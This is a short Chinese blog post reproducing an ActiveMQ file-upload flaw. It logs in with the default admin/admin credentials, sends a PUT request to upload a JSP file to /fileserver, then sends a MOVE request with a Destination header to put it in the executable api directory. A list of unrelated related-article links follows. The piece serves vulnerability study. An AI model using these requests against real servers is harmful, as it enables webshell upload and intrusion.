ActiveMQ 任意文件上传漏洞复现

一、使用弱口令登陆

​ 访问 http://ip:8161/admin/ 进入admin登陆页面,使用弱口令登陆,账号密码皆为 admin,登陆成功后,headers中会出现验证信息

​ 如: Authorization: Basic YWRtaW46YWRtaW4=

# 二、利用PUT协议上传文件

​ 访问任意页面并抓包,注意headers中的验证信息

​ 将GET协议修改为PUT协议,将文件上传至 fileserver 目录下

复制代码
PUT /fileserver/jsp.jsp

​ 如上图,response 包中返回状态码为 204,即文件上传成功

​ 但是直接在 fileserver 目录下访问该文件是不能正常解析的

# 三、利用MOVE协议将文件移动至可解析目录

​ 继续修改请求包协议为 MOVE,并在头部中添加 Destination

复制代码
MOVE /fileserver/jsp.jsp
Destination: file:///opt/activemq/webapps/api/jsp.jsp

​ 同样的,响应包返回的状态码为 204,代表文件成功移动到 api 目录下

​ 代码被成功执行

相关推荐
儒道易行3 小时前
【攻防实战】Redis未授权RCE联动metasploit打穿三层内网(下)
网络安全
cui_win5 小时前
Minikube 安装与使用详细指南(Centos7 踩坑版)
docker·kubernetes·minikube·centos7·升级内核
行思理7 小时前
Dockerfile 各指令说明
运维·macos·docker·容器·php
FreeBuf_7 小时前
Docker Compose曝路径遍历漏洞,可致任意覆写文件(CVE-2025-62725)
docker·容器·eureka
dwedwswd8 小时前
亲子娱乐升级!Docker 电视盒子 ADB 安装助手,儿童 APP 一键装满电视
docker·娱乐·电视盒子
半梦半醒*8 小时前
k8s——资源管理
linux·运维·docker·容器·kubernetes·自动化
小Pawn爷8 小时前
构建Django的Web镜像
前端·python·docker·django
梁萌9 小时前
在linux上使用docker搭建ELK日志框架
elk·elasticsearch·docker·kibana·logstash·日志框架
落世繁华9 小时前
Docker快速部署--Mysql一键初始化
运维·mysql·docker·容器·一键部署
胡耀超9 小时前
AI应用开发入门,docker部署 Milvus + GPUStack (Attu+MinIO)的基础入门!
人工智能·docker·ai·大模型·milvus·rag·gpustack